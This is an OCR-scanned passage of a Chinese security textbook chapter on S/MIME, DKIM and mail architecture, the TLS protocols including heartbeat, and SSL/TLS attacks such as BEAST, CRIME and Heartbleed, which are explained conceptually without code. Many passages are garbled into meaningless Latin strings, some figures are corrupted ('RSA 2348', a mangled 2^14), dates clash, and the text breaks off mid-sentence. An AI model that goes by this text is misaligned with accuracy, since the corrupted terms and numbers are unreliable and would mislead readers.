任何 常规 加 密 应 用 中 ， 密 钥 分 发 问题 必须 解决 。 在 S/MIME 中 ， 每 个 常规 密 钥 只 能 使 用 一 次 。 
也 就 是 说 ， 对 每 个 新 消息 加 密 都 需要 产生 一 个 新 的 伪 随 机 密 铀 。 这 个 会 话 密 钥 被 绑 定 在 消息 
中 并 和 它 一 起 传输 。 该 密 钥 被 用 来 作为 公 钥 加 密 算法 RSA 的 输入 ， 使 用 接收 方 的 RSA 2348 
对 该 密 钥 进行 加 密 。 在 接收 方 端 ，S/MIME 使 用 接收 方 的 RSA 私 钥 ， 恢 复 密 钥 并 且 使 用 这 个 密 
SAA AES 算法 恢复 消息 明文 。 

如 果 仅 用 于 加 密 ，radix-64 是 用 来 把 密 文 转化 为 ASCI 格式 的 。 

公 角 证书” 就 如 上 面 所 讨论 的 ，S/MIME 含有 一 个 精巧 、 高 效 和 连锁 的 功能 集合 和 格式 来 
提供 有 效 的 加 密 和 签名 服务 。 为 了 完善 该 系统 ， 最 后 需要 引起 注意 的 问题 是 公 钥 管理 问题 。 

允许 S/MIME 大 规模 使 用 的 基本 工具 是 公 钥 证 书 。S/MIME 使 用 的 证 书 遵从 Internet 标准 
X.509v3 ， 我 们 将 在 第 23 章 中 讨论 。 


22.2 域名 密 钥 识别 邮件 标准 


域名 密 钥 识别 邮件 标准 ( DomainKeys Identified Mail, DKIM) 是 一 种 电子 邮件 消息 加 密 
签名 的 规范 ， 它 允许 一 个 签名 的 域名 来 声明 其 对 邮件 流 中 的 某 个 消息 负责 。 邮 件 接收 者 (或 者 
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代表 他 们 的 代理 人 ) 可 以 通过 查询 签名 者 的 域名 来 直接 得 到 对 应 的 公 钥 来 验证 签名 ， 进 而 确 
认 消 息 是 来 自 于 拥有 签名 域名 私 钥 的 一 方 。DKIM 被 指定 在 一 个 Intemet 建议 标准 RFC 4871 
(DomainKeys Identified Mail (DKIM ) Signatures, 2007) 中 。DKIM 已 被 一 系列 的 电子 邮件 提 
供 商 广泛 采用 ， 包 括 很 多 企业 、 政 府 机 构 、gmail、yahoo 和 许多 Internet 服务 提供 商 (Internet 
Service Provider, ISP) 等 。 


22.2.1 Internet 邮件 体系 结构 


为 了 理解 DKIM 的 运行 ， 对 Internet 邮件 体系 结构 (Internet mail architecture) 有 一 个 基本 
的 了 解 将 会 是 十 分 有 帮助 的 。Internet 邮件 体系 结构 目前 是 在 RFC 5598 (Internet 邮件 体系 结构 ， 
2009 Æ) 中 定义 的 。 本 小 节 将 对 这 些 基本 概念 进行 简要 介绍 。 

在 最 基本 的 层面 上 ，Internet 邮件 体系 结构 由 一 个 表现 为 邮件 用 户 代 理 ( Message User 
Agent, MUA) 形式 的 用 户 区 和 表现 为 消息 处 理 服务 (Message Handling Service, MHS) 形式 
的 传输 区 组 成 ，MHS 由 邮件 传输 代理 ( Message Transfer Agent, MTA) 构成 。MHS 从 一 个 用 
户 那 里 接收 消息 并 把 它 交 付 给 一 个 或 多 个 其 他 用 户 ， 从 而 创建 一 个 虚拟 的 MUA-to-MUA 交换 
环境 。 该 体系 结构 包括 三 种 类 型 的 交互 。 直 接 在 用 户 之 间 的 交互 : 消息 必须 由 MUA 代表 信息 
发 送 方 进行 格式 化 ， 使 得 消息 可 以 由 目的 MUA 展示 给 邮件 收 件 人 。 Æ MUA 和 MHS 之 间 也 
有 互 操 作 性 需求 : 首先 一 个 消息 从 MUA 发 送 到 MHS， 然 后 从 MHS 交付 给 目标 MUA。 男 外 ， 
沿 着 MHS 传输 路 径 的 MTA 组 件 之 间 的 互 操作 性 也 是 需要 的 。 

图 22-2 给 出 了 Internet 邮件 体系 结构 的 关键 组 成 部 分 ， 包 括 : 

e 邮件 用 户 代 理 ( Message User Agent, MUA): 代表 用 户 和 用 户 应 用 程序 工作 ， 在 邮件 

服务 中 是 用 户 的 代理 人 。 通 常 ， 该 组 件 在 用 户 的 计算 机 中 被 称 为 电子 邮件 客户 端 程序 
或 者 本 地 网 络 电子 邮件 服务 器 。 邮 件 作者 MUA 将 消息 格式 化 ， 并 通过 MSA 初始 提交 
到 MHS。 收 件 人 MUA 处 理 接收 到 的 邮件 ， 进 行 存储 或 展示 给 收 件 人 。 





邮件 作者 





消息 接收 者 多 


Rea 
图 22-2 在 Internet 邮件 体系 结构 中 ， 功 能 组 件 及 它们 之 间 使 用 的 标准 化 协议 
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o 邮件 提交 代理 (Mail Submission Agent, MSA): 接收 MUA 提交 的 消息 ， 执 行 宿主 域名 
的 策略 和 Internet 标准 的 要 求 。 该 组 件 可 以 与 MUA 一 起 配置 ， 也 可 以 作为 一 个 单独 的 
功能 模型 。 在 后 者 的 情形 下 ，MUA 和 MSA 之 间 使 用 简单 邮件 传输 协议 ( Simple Mail 
Transfer Protocol, SMTP). 
© 邮件 传输 代理 (Message Transfer Agent, MTA): 以 应 用 层 的 一 跳 的 形式 传送 邮件 ， 就 
像 一 个 数据 包 在 交换 机 或 者 IP 路 由 右 中 进行 路 由 选择 一 样 ， 将 消息 向 离 接 收 者 更 近 的 
方向 传送 。 传 送 是 在 一 系列 MTA 之 间 进 行 的 ， 直 到 消息 到 达 目 的 MDA。MTA 也 会 在 
消息 头 部 添加 跟踪 信息 。 在 MTA 和 MTA 之 间 ，MTA 和 MSA 或 者 MDA 之 间 ， 使 用 
SMTP 协议 。 
e 邮件 投递 代理 (Mail Delivery Agent, MDA): 负责 将 消息 从 MHS 传送 到 MS. 
e 邮件 存储 器 ( Message Store, MS): 一 个 MUA 可 以 使 用 长 期 工作 的 MS。MS 可 以 位 于 
WREAK ae, BAA MUA EHRL E. W, MUA 从 远程 服务 项 上 取 回 消息 
使 用 的 是 POP (Post Office Protocol) 或 者 IMAP (Internet Message Access Protocol) 协议 。 
另外 ,还 有 两 个 概念 需要 被 定义 。 一 个 是 行政 管理 域 (Administrative Management 
Domain，ADMD)， 它 是 一 个 Internet 邮件 提供 者 。 这 样 的 例子 包括 一 个 运营 本 地 邮件 中 继 
(MTA) 的 部 门 ， 一 个 运营 企业 邮件 中 继 的 IT 部 门 ， 以 及 运营 公共 共享 电子 邮件 服务 的 ISP 
( Internet 服务 提供 商 )。 每 一 个 ADMD 都 可 以 有 不 同 的 运营 策略 和 基于 信任 的 决策 。 一 个 明显 
的 例子 是 ， 在 一 个 组 织 内 部 交换 的 邮件 与 独立 组 织 之 间 交 换 的 邮件 存在 的 区 别 。 用 于 处 理 这 两 
种 类 型 的 业务 的 规则 往往 是 完全 不 同 的 。 
另 一 个 概念 是 域名 系统 。 域 名 系统 (Domain Name System, DNS) 是 一 种 目录 查询 服务 ， 
其 提供 了 Internet 上 主机 域名 和 其 数字 地 址 之 间 的 映射 。 


22.2.2 DKIM 策略 


DKIM 是 为 提供 一 个 对 终端 用 户 透 明 的 电子 邮件 认证 技术 而 设计 的 。 本 质 上 ， 使 用 电子 邮 
件 所 来 自 的 管理 域 的 私 铀 ， 对 用 户 的 电子 邮件 消息 进行 签名 。 该 签名 涵盖 了 所 有 的 消息 内 容 和 
一 些 RFC 5322 (Internet 消息 格式 ，2008 Æ) FRA. FEE MOG, MDA 可 通过 DNS 得 到 相应 
的 公 钥 并 验证 签名 ， 从 而 验证 该 消息 来 自 于 其 所 声明 的 管理 域 。 因 此 ， 来自 别 的 地 方 但 声称 来 
自 于 给 定 域 的 邮件 ,将 无 法 通过 认证 测试 ， 并 会 被 拒绝 。 该 方法 不 同 于 S/MIME, S/MIME 使 
用 发 送 者 的 私 钥 对 消息 内 容 进 行 签 名 。DKIM 的 动机 是 基于 以 下 推理 : 

1. S/MIME 依赖 于 发 送 和 接收 的 用 户 都 使 用 SIMIME。 对 于 几乎 所 有 的 用 户 来 说 ， 大 部 分 
接收 到 的 邮件 都 不 使 用 S/MIME， 而 且 用 户 想 要 发 送 给 接收 人 的 大 部 分 邮件 也 不 使 用 S/MIME... 

2. S/MIME 仅仅 签名 消息 内 容 。 因 此 ， 涉 及 邮件 来 源 的 RFC 5322 消息 头 信息 可 能 会 受到 
破坏 。 

3. DKIM 并 不 在 客户 端 程序 (MUA) 中 实现 ， 因 此 对 用 户 透 明 ; 用 户 无 须 做 任何 操作 。 

4. DKIM 会 应 用 到 来 自 于 具有 协作 关系 的 域 的 所 有 的 邮件 。 

5. DKIM 使 得 真实 发 件 人 可 以 证 明 他 们 确实 发 送 过 特定 消息 ， 并 防止 伪造 者 伪装 成 真实 发 
件 人 。 

图 22-3 给 出 了 DKM 运行 的 一 个 简单 的 例子 。 首 先 ， 由 用 户 生 成 一 个 消息 ,传输 到 
MHS ， 接 着 传输 给 用 户 所 在 的 管理 域 之 内 的 MSA。 电 子 邮件 消息 由 一 个 电子 邮件 客户 端 程序 
生成 。 消 息 内 容 加 上 所 选 RFC 5322 消息 头 ， 被 电子 邮件 提供 者 使 用 提供 者 的 私 钥 进行 签名 。 
签名 者 与 域 相关 ， 这 可 能 是 一 个 企业 局 域 网 、 一 个 ISP 或 者 公共 电子 邮件 设施 (如 gmail)。 然 
后 ， 签 名 后 的 消息 通过 Internet 经 过 一 系列 的 MTA 进行 传输 。 在 目的 地 ，MDA 取 回 传人 的 签 
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名 所 对 应 的 公 钥 ， 并 在 将 邮件 传递 到 目标 电子 邮件 客户 端 之 前 验证 签名 。 默 认 的 签名 算法 是 带 
有 SHA-256 的 RSA 算法 。 也 可 以 使 用 带 有 SHA-1 的 RSA 算法 。 


SMTP 








邮件 发 起 网 络 邮件 交付 网 络 


DNS: 域名 系统 

MDA: 邮件 投递 代理 
MSA: 邮件 提交 代理 
MTA: 邮件 传输 代理 
MUA: 邮件 用 户 代理 


图 22-3 DKIM 部 署 的 简单 示例 


22.3 ”安全 套 接 层 和 传输 层 安 全 


应 用 最 广泛 的 一 个 安全 服务 就 是 安全 套 接 层 ( Secure Socket Layer ，SSL) 和 随后 出 现 的 
Internet 标准 RFC 4346 (传输 层 安 全 (Transport Layer Security, TLS) 协议 版 本 1.1, 2006 年 )。 
TLS 已 经 在 很 大 程度 上 取代 了 早期 的 SSL 实现 。TLS 是 以 一 组 协议 的 方式 实现 的 一 个 通用 服 
务 ， 其 中 的 协议 依赖 于 TCP。 在 这 个 层面 上 ， 有 两 种 实现 方案 可 供 选 择 。 为 保证 充分 的 通用 
性 , TLS 可 以 作为 基础 协议 组 的 一 部 分 ， 因 此 对 应 用 来 说 是 透明 的 。 作 为 选择 ，TLS tA DK 
和 在 特定 的 软件 包 中 。 例 如 ， 大 多 数 浏 览 右 都 配备 了 SSL 协议 ， 并 且 多 数 Web 服务 天 也 实现 
了 这 个 协议 。 


22.3.1 TLS 体系 结构 


TLS 被 设计 成 使 用 TCP 来 提供 可 靠 的 端 到 端的 安全 服务 。TLS 不 是 简单 的 单个 协议 ， 而 
是 两 层 协议 ， 如 图 22-4 tas. 

记录 协议 (Record Protocol) 为 多 种 高 层 协 
议 提供 基本 的 安全 服务 。 特 别 地 ， 超 文本 传输 
协议 ( Hypertext Transfer Protocol, HTTP) 是 
为 Web 客户 闯 / 服 务 右 交互 提供 传输 服务 
的 ， 它 可 以 在 TLS 的 顶层 运行 。 三 个 较 高 层 
次 的 协议 被 定义 为 TLS 的 一 部 分 ， 它 们 是 握 
手 协 议 ( Handshake Protocol)、 变 更 密码 规范 
协议 ( Change Cipher Spec Protocol) 及 报警 图 22-4 SSL/TLS HMYAE 
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667| 协议 (Alert Protocol). X4 TLS 特有 的 协议 ， 用 于 TLS 交换 的 管理 。 后 面 将 分 析 这 些 内 容 。 
En TLS 协议 中 的 两 个 重要 概念 是 TLS 会 话 和 TLS 连接 ， 它 们 在 规范 中 的 定义 如 下 : 
o 连接 (connection): 连接 是 一 种 能 够 提供 合适 服务 类 型 的 传输 (依据 OSI 层次 模型 中 的 
定义 )。 对 TLS 来 说 ， 这 样 的 连接 是 点 到 点 的 连接 关系 ， 而 且 这 些 连接 是 瞬 态 的 、 暂 
时 的 。 每 一 个 连接 都 与 一 个 会 话 关联 。 
© iF (session): TLS 会 话 是 一 个 客户 端 和 一 个 服务 器 之 间 的 一 种 关联 。 会 话 由 握手 协 
W ( Handshake Protocol) 创建 。 所 有 会 话 都 定义 了 一 组 密码 安全 参数 ， 这 些 安全 参数 
可 以 在 多 个 连接 之 间 共 享 。 会 话 可 以 用 来 避免 每 个 连接 需要 进行 的 、 代 价 高 昂 的 新 的 
安全 参数 的 协商 过 程 。 
在 任何 一 对 实体 之 间 (例如 ， 客 户 端 和 服务 器 上 HTTP 应 用 )， 可 以 有 多 个 安全 连接 。 理 
论 上 讲 ， 也 允许 一 对 实体 之 间 同 时 有 多 个 会 话 存在 ， 但 这 个 特性 在 实际 中 并 没有 使 用 。 


22.3.2 TLS 协议 


记录 协议 SSL 记录 协议 为 SSL 连接 提供 了 两 种 服务 : 

e 机 密 性 (confidentiality): 握手 协议 定义 了 一 个 共享 密 钥 ， 用 于 对 SSL 载荷 对 称 加 密 。 

e 消息 完整 性 (message integrity): 握手 协议 还 定义 了 一 个 共享 密 钥 ， 它 用 来 产生 一 个 消 

息 认证 码 (Message Authentication Code, MAC). 

图 22-5 给 出 了 SSL 记录 协议 的 全 部 操作 流程 。 第 一 步 是 分 段 (fragmentation )。 首 先 将 每 个 

上 层 消息 分 解 成 不 大 于 2" 字 节 (16 384 字 节 ) 的 组 ， 然 后 有 选择 地 进行 压缩 (compression). Xb 

理 过 程 的 第 二 步 是 在 压缩 数据 的 基础 上 计算 消 
息 认 证 码 ( message authentication code), SRA 
把 压缩 消息 加 上 MAC 用 对 称 加 密 方法 进行 加 
密 (encrypt)。 

SSL 记录 协议 的 最 后 一 步 处 理 是 添加 
(prepend) 一 个 头 部 ， 其 中 包含 版 本 和 长 
度 域 。 

定义 的 内 容 类 型 包括 变更 密码 规范 协议 、 
报 获 协议 、 握 手 协议 及 应 用 数据 4 种 。 前 3 
个 是 针对 TLS 的 协议 ， 后 面 将 讨论 这 几 个 协 i 
议 。 值 得 注意 的 是 ， 可 能 使 用 TLS 的 各 种 应 eee TLS RET 
用 之 间 不 存在 区 别 ， 由 这 些 应 用 (如 HTTP) 所 产生 的 数据 的 内 容 对 于 TLS 来 说 是 不 透明 的 。 

然后 ， 记 录 协 议 在 一 个 TCP 段 中 传输 作为 结果 的 单元 。 将 收 到 的 数据 进行 解密 、 验 证 、 
解压 ， 并 重新 组 装 (reassembled)， 再 交付 给 更 高 级 别 的 用 户 。 

变更 密码 规范 协议 ”变更 密码 规范 协议 是 TLS 记录 协议 中 的 4 个 TLS 规范 协议 之 一 ， 该 
协议 也 是 最 简单 的 。 这 个 协议 只 包含 一 条 消息 ， 由 一 个 值 为 1 的 字 节 组 成 。 这 个 消息 的 唯一 功能 
就 是 将 预备 状态 (pending state) 拷贝 到 当前 状态 ， 该 消息 更 新 了 在 这 一 连接 中 使 用 的 密码 套件 。 

报警 协议 ”报警 协议 用 于 将 与 TLS 相关 的 报警 传达 给 对 等 实体 。 与 使 用 TLS 的 其 他 应 用 
一 样 ， 报 次 消息 需要 依据 当前 状态 的 规范 进行 压缩 和 加 密 。 

这 个 协议 中 的 每 个 消息 由 两 个 字 节 组 成 。 其 中 的 第 一 个 字 节 通过 值 1 表示 警告 ， 值 2 表示 
致命 错误 ， 来 表达 消息 出 错 的 严重 程度 。 如 果 级 别 为 致命 , TLS 立即 中 断 当 前 连接 。 而 会 话 中 
其 他 连接 继续 进行 ， 但 不 会 在 此 会 话 中 建立 新 连接 。 第 二 个 字 节 包含 了 一 个 描述 特定 警报 信息 
的 编码 。 例 如 ， 严 重 程 度 为 致命 的 警报 的 一 个 例子 是 ， 一 个 不 正确 的 MAC ; 严重 程度 为 非 致 
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命 的 警报 的 一 个 例子 是 ， 一 个 close_notify 消息 ， 它 通知 收 件 人 本 次 连接 中 发 送 方 将 不 再 发 送 
服务 器 


任何 其 他 的 消息 。 
握手 协议 TL 最 复杂 的 部 分 就 是 
握手 协议 。 这 个 协议 允许 服务 和希 和 客户 端 
互相 认证 ， 并 协商 加 密 和 MAC 算法 ， 以 
及 用 于 保护 TLS 记录 中 所 发 送 数据 的 加 
密 密 钥 。 握 手 协议 在 任何 应 用 数据 被 传输 
之 前 使 用 。 
握手 协议 由 一 系列 客户 端 和 服务 器 
之 间 交 换 的 消息 组 成 。 图 22-6 FARE T Æ 
客户 端 和 服务 器 之 间 建 立 一 个 人 逻辑 连接 所 
需要 的 最 初 的 交换 过 程 。 这 种 消息 交换 有 
4 个 阶段 。 
第 一 阶段 用 来 初始 化 一 个 逻辑 连接 
并 建立 与 之 相关 的 安全 能 力 。 交 换 由 客户 
WMA, AP ep AIK client hello 消息 ， 
该 消息 带 有 如 下 参数 : 
e 版 本 (version): 客户 端 所 支持 的 
最 高 TLS 版 本 。 
e 随机 数 (random): 一 个 客户 端 生 
成 的 随机 结构 ， 由 一 个 32 位 的 时 
间 戳 和 一 个 由 安全 随机 数 发 生 硕 














第 一 阶段 : 建立 安全 能 
力 ， 包括 协议 版 本 、 会 话 
ID 、 密 码 套件 、 压 缩 方法 
和 初始 随机 数 


ease d BORE: 服务 器 发 送 
cai 证 书 、 密 钥 交 换 数据 和 证 
mi 书 请 求 ， 最 后 发 送 hello 

消息 阶段 的 结束 信号 


第 三 阶段 : 如 果 有 证 书 

| 请求， 客户 端 发 送 其 证 书 。 
之 后 客户 端 发 送 密 钥 交 换 

aa ER 
w AE 


第 四 阶段 : 变更 密码 套 
件 ， 结 束 握 手 协 议 


注 : 加 阴影 的 传输 是 可 选 
的 或 者 依赖 于 消息 的 状态 ， 
并 不 要 求 必须 传递 


图 22-6 ”握手 协议 过 程 


生成 的 28 字 节 随机 数组 成 。 这 些 值 在 密 钥 交换 时 用 来 防止 重 放 攻 击 。 

e 会 话 标 识 (session ID): 一 个 可 变 长 的 会 话 标识 符 。 标 识 符 为 非 0 值 ， 表 示 客 户 端 希望 
更 新 一 个 已 经 存在 的 连接 的 参数 或 者 在 这 次 会 话 中 建立 一 个 新 的 连接 ; 0 值 则 表示 客 
户 端 希望 在 新 的 会 话 中 建立 一 条 新 的 连接 。 

e 密码 套件 (cipher suite): 这 是 一 个 由 客户 端 支 持 的 加 密 算法 组 合 的 列表 ， 按 照 优先 选 
用 的 递减 次 序 排列 。 列 表 中 的 每 一 行 ( 即 每 一 个 密码 套件 ) 定义 了 一 个 密 钥 交换 算法 和 


密码 规范 (CipherSpec )。 


e 压缩 方法 (compression method): 这 是 一 个 客户 端 文 持 的 压缩 方法 的 列表 。 
当 客户 端 发 出 client_hello HEIR, AP nS IRS ahh server hello 消息， 该 消息 包含 了 


与 客户 端 client hello 消息 中 同样 的 参数 。 


第 二 阶段 的 细节 依赖 于 所 使 用 的 公 钥 加 密 方案 。 在 一 些 情况 下 ， 服 务 需 发 送 给 客户 端 一 个 
证 书 (可 能 附加 了 密 钥 信 息 )， 并 请 求 来 日 客户 端的 证 书 。 

在 第 二 阶段 最 后 的 消息 是 一 个 经 常 被 请 求 的 消息 ， 它 是 server done 消息 ， 由 服务 器 发 送 并 示 
意 服务 器 hello 消息 及 其 他 相关 消息 结束 。 当 发 送 完 这 个 消息 后 ， 服 务 器 将 等 待 客户 端的 反应 。 

第 三 阶段 中 收 到 server done 消息 后 ， 如 果 有 需要 ， 客 户 端 应 该 验证 服务 器 提供 的 证 书 的 
有 效 性 ， 并 且 同 时 检查 sever hello 参数 是 否 是 可 接受 的 。 如 果 所 有 条 件 都 满足 ， 客 户 端 会 给 
服务 器 返回 一 个 或 多 个 消息 ， 这 依赖 于 所 使 用 的 公 钥 密码 方案 。 

第 四 阶段 建立 安全 连接 完成 。 客 户 端 发 送 一 个 变更 密码 规范 (change_cipher spec) 的 消 
息 ， 并 把 一 个 未 定 的 密码 规范 复制 到 现在 的 密码 规范 中 。 值 得 注意 的 是 ， 这 个 消息 不 能 认为 是 
握手 协议 的 一 部 分 ， 而 是 用 变更 密码 规范 协议 发 送 。 客 户 端 在 新 算法 、 密 钥 和 密码 下 立即 发 送 
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结束 (finish) 消息 ， 结 束 消 息 用 于 核实 密 钥 交换 和 认证 过 程 是 成 功 的 。 

作为 对 客户 端 发 送 的 这 两 条 消息 的 回应 ， 服 务 器 发 送 它 自 己 的 变更 密码 规范 消息 ( change_ 
cipher spec message)， 把 未 定 的 密码 规范 转移 到 现在 的 密码 规范 中 ,并 发 送 它 的 结束 消息 。 到 
此 为 止 握手 过 程 结 束 ， 客 户 端 和 服务 器 可 以 开始 交换 应 用 层 的 数据 了 。 

心跳 协议 (Heartbeat Protocol) 由 计算 机 网 络 的 相关 知识 我 们 知道 ， 心 跳 (heartbeat) 是 由 
硬件 或 软件 产生 的 一 个 周期 性 的 信号 ， 用 以 表明 操作 正常 ， 或 用 以 与 一 个 系统 的 其 他 部 分 进行 
同步 。 心 跳 协议 通常 用 于 监测 一 个 协议 实体 的 可 用 性 。 在 SSL/TLS 的 特定 情形 下 ， 心 跳 协 议 
(Heartbeat Protocol) 于 2012 年 定义 在 RFC 6250 (传输 层 安 全 协议 (TLS) 与 数据 报 传输 层 安全 
性 协议 (DTLS) 心跳 扩展 ，2011 年 ) 中 。 

心跳 协议 运行 在 TLS 记录 协议 的 顶部 ， 包 括 两 种 消息 类 型 : 心跳 请 求 (heartbeat request) 
和 心跳 啊 应 (heartbeat response)。 心 跳 协 议 的 使 用 是 在 握手 协议 的 第 一 阶段 ( 见 图 22-6 ) 中 确 
立 的 。 每 一 个 对 等 端 都 要 表明 其 是 否 支 持 心 跳 。 如 果 支 持 ， 则 要 指出 它 是 否 愿意 接收 heartbeat _ 
request 消息 并 以 heartbeat response 消息 啊 应 ， 还 是 仅仅 愿意 发 送 heartbeat_request 消息 。 

heartbeat_request 消息 可 以 随时 发 送 。 每 当 接 收 到 请 求 消息 时 ， 都 应 当 及 时 地 以 相应 的 
heartbeat response 消息 给 予 回答 。heartbeat request 消息 包含 载 谷 的 长 度 、 载 倚 (payload) 和 填 
充 字 段 。 载 荷 是 长 度 在 16 字 节 到 64k 字 节 之 间 的 一 段 随机 内 容 。 相 应 的 heartbeat response 消 
息 必须 包含 接收 到 的 载荷 的 一 个 准确 的 拷贝 。 填 充 字段 中 也 是 随机 的 内 容 。 填 充 字段 使 得 发 送 
方 执行 发 现 一 条 路 径 的 最 大 传输 单元 ( Maximum Transfer Unit, MTU) 操作 : 通过 发 送 请 求 不 
断 增 大 填充 直到 接收 不 到 响应 ， 因 为 路 径 上 的 其 中 一 台 主 机 无 法 处 理 该 消息 。 

BE (heartbeat) 有 两 个 目的 。 第 一 ， 它 辣 发 送 者 确保 接收 端 还 活着 ， 即 使 有 可 能 在 底层 
TCP 连接 上 已 有 一 段 时 间 没 有 任何 活动 。 第 二 ， 心 跳 生 成 了 空闲 时 间 段 中 的 活动 连接 ， 以 避免 
被 不 容忍 空闲 连接 的 防火 墙 关 闭 抒 。 

对 载荷 交换 的 要 求 被 设计 到 心跳 协议 中 ， 以 支持 其 在 无 连接 的 TLS 版 本 ( 即 DTLS) 中 使 
用 。 由 于 无 连接 服务 面临 数据 包 丢 失 问 题 ， 载 荷 使 得 请 求 者 能 够 将 响应 消息 和 请 求 消息 进行 匹 
配 。 为 了 简单 起 见 ， 相 同 版 本 的 心跳 协议 在 TLS 和 DTLS 中 都 可 以 使 用 ， 因 此 ，TLS 和 DTLS 
ABSA ET o 


22.3.3 SSL/TLS 攻击 


自从 在 1994 年 首次 引入 SSL 及 随后 TLS 标准 化 以 来 ， 针 对 这 些 协 议 的 许多 攻击 已 被 设计 
出 来 。 每 个 攻击 的 出 现 都 迫使 协议 、 使 用 的 加 密 工 具 或 者 SSL 和 TLS 实现 的 某 些 方面 进行 改 
进 ， 以 应 对 这 些 威胁 。 

攻击 类 型 ”我 们 可 以 把 相关 的 攻击 分 成 如 下 4 类 : 

e 握手 协议 攻击 : 早 在 1998 年 ,一 种 基于 利用 RSA 加 密 方案 的 格式 和 实现 中 的 漏洞 来 
破坏 握手 协议 的 方法 就 已 被 提出 ( [BLEI98])。 随 着 应 对 措施 的 实施 ， 攻 击 也 进行 了 细 
化 和 调整 ， 这 不 仅 阻碍 了 对 策 的 实现 ， 也 加 快 了 进攻 速度 (比如 BARD12 )。 
记录 和 应 用 数据 协议 攻击 : 在 这 些 协议 中 已 被 发 现存 在 许多 漏洞 ， 从 而 导致 需要 打 
一 些 补丁 来 应 对 新 的 威胁 。 最 近 的 一 个 例子 是 , 在 2011 年 ， 研 究 人 员 Thai Duong 和 
Juliano Rizzo 展示 了 一 个 称 为 “BEAST” (Browser Exploit Against SSL/TLS) 的 概念 验 
证 ， 把 曾经 被 认为 只 有 理论 上 存在 的 漏洞 转化 成 实际 的 攻击 [GOOD11]. “BEAST” 3 
用 了 一 种 称 为 选择 明文 攻击 的 密码 学 攻击 方法 。 攻 击 者 通过 为 与 已 知 密 文 相关 联 的 明 
文选 择 一 个 猜测 进行 攻击 。 该 研究 人 员 开 发 出 一 种 实用 的 算法 来 发 动 成 功 的 攻击 。 随 
后 出 现 的 补丁 能 够 阻止 这 种 攻击 。BEAST 攻击 的 作者 也 是 2012 年 CRIME (Compression 
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Ratio Info-leak Made Easy) 攻击 的 创造 者 ，CRIME 攻击 使 得 当 数 据 压 缩 和 TLS 一 起 使 
用 时 ， 攻 击 者 能 够 恢复 出 网 络 cookie 的 内 容 ([GOOD12b])。 

e PKI 攻击: 检查 X.509 证 书 在 遭受 各 种 攻击 时 的 有 效 性 ， 可 以 在 SSL/TLS 中 和 其 他 环 
境 下 进行 。 例 如 ，[GEOR12] 阐明 了 SSL/TLS 通常 使 用 的 库 就 受到 由 于 证 书 验 证 实现 
存在 漏洞 所 造成 的 威胁 。 作 者 揭示 了 OpenSSL、GnuTLS、JSSE、ApacheHttpClient、 
Weberknecht, cURL., 、PHP 、Python， 以 及 基于 或 使 用 这 些 程序 的 应 用 程序 源码 中 的 弱点 。 

e 其 他 攻击 : [MEYE13] 列 出 了 一 些 不 属于 上 述 任何 类 别 的 攻击 。 一 个 例子 就 是 在 2011 
年 宣布 的 由 德国 黑客 组 织 The Hackers Choice 发 起 的 攻击 ， 它 是 一 个 拒绝 服务 攻击 
(DoS attack) [KUMA11]。 该 攻击 通过 利用 大 量 的 SSL/TLS 握手 请 求 在 服务 器 上 产生 沉 
重 的 处 理 负 载 ， 导 致 目标 服务 器 不 能 正常 工作 。 增 加 系统 负载 是 通过 建立 新 的 连接 或 
使 用 重新 协商 来 实现 的 。 假 定 握 手 期 间 的 大 部 分 计算 是 由 服务 器 完成 的 ， 该 攻击 在 服 
务 右 上 创造 了 比 原 设备 上 更 多 的 系统 负载 ， 导 致 拒绝 服务 。 服 务 器 被 迫 不 断 地 重新 计 
算 随 机 数 和 密 钥 。 

SSL/TLS 攻击 及 其 对 策 的 发 展 历 史 是 其 他 基于 Internet 协议 发 展 过 程 的 代表 。“ 完 美 ”的 
协议 和 “完美 ”的 实施 策略 永远 无 法 实现 。 威 胁 与 对 策 之 间 的 不 断 反 复 的 过 程 决 定 了 基于 
Internet 协议 的 演变 与 发 展 。 

心脏 出 血 (heartbleed) 2014 年 发 现 的 TLS 软件 中 的 缺陷 造成 了 一 个 潜在 的 最 具 灾 难 性 的 
TLS 漏洞 之 一 。 该 缺陷 存在 于 开源 的 OpenSSL 对 心跳 协议 的 实现 过 程 中 。 需 要 注意 的 是 ， 这 
个 汤 洞 不 是 TLS 规范 中 的 设计 缺陷 ， 而 是 在 OpenSSL 库 中 的 一 个 编程 错误 。 

要 了 解 该 源 洞 的 本 质 ， 先 回顾 我 们 之 前 的 讨论 ， 我 们 知道 heartbeat request 消息 包括 载 丛 
长 度 、 载 荷 和 填充 字段 。 在 修复 该 缺陷 之 前 ，OpenSSL 版 本 的 心跳 协议 的 工作 方式 如 下 : 该 软 
件 读 取 传人 的 请 求 消息 ， 并 分 配 一 个 大 到 足以 容纳 该 消息 首部 、 载 荷 和 填充 字段 的 缓冲 区 ; 然 
后 ， 它 用 传人 的 消息 覆盖 缓冲 区 的 当前 内 容 ， 改 变 第 一 字 节 用 以 指出 响应 消息 类 型 ， 然 后 发 送 
一 个 啊 应 消息 ， 其 中 包括 载荷 长 度 字 段 和 载荷 。 但 是 ， 该 软件 并 不 检查 传人 消息 的 消息 长 度 。 
因此 ， 攻 击 者 可 以 发 送 一 条 消息 ， 该 消息 声称 有 最 大 负载 长 度 64KB， 但 其 实 只 包括 最 低 载 荷 
16 字 节 。 这 意味 着 将 近 64KB 的 缓冲 不 会 被 覆盖 ， 此 时 任何 刚好 在 此 内 存 中 的 内 容 将 发 送 给 
请 求 者 。 反 复 的 攻击 可 导致 在 脆弱 的 系统 上 大 量 的 内 存 中 的 重要 信息 被 泄露 。 图 22-7 阐释 了 
预期 的 行为 和 心脏 出 血 漏 洞 的 实际 行为 。 


提取 载荷 并 将 之 


心跳 请 求 消息 


确保 接收 到 的 
载荷 是 一 样 的 





a) TLS 心 跳 协 议 工作 过 程 b) 心脏 出 血 漏 洞 工作 过 程 
图 22-7 AE HE f Das ial 
来 源 : “ Heartbleed-The OpenSSL Heartbeat Exploit” Copyright © 2014 BAE Systems Applied Intelligence. Reprinted 
with permission. 
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这 是 一 个 惊人 的 缺陷 。 原 封 不 动 的 内 存 中 可 能 包含 私 钥 、 用 户 喘 份 信息 、 认 证 数据 、 密 码 
或 其 他 敏感 数据 。 该 缺陷 存在 了 好 几 年 并 没有 被 发 现 。 尽 管 所 有 实现 中 的 缺陷 最 终 都 得 到 了 修 
复 , 但 是 大 量 的 敏感 数据 已 被 暴露 到 了 Internet 上。 因此， 我们 有 较 长 的 暴露 时 间 和 容易 实现 
的 攻击 ， 而 且 攻 击 不 会 留 下 任何 痕迹 。 从 这 个 缺陷 中 完全 恢复 可 能 需要 数 年 时 间 。 使 问题 更 复 
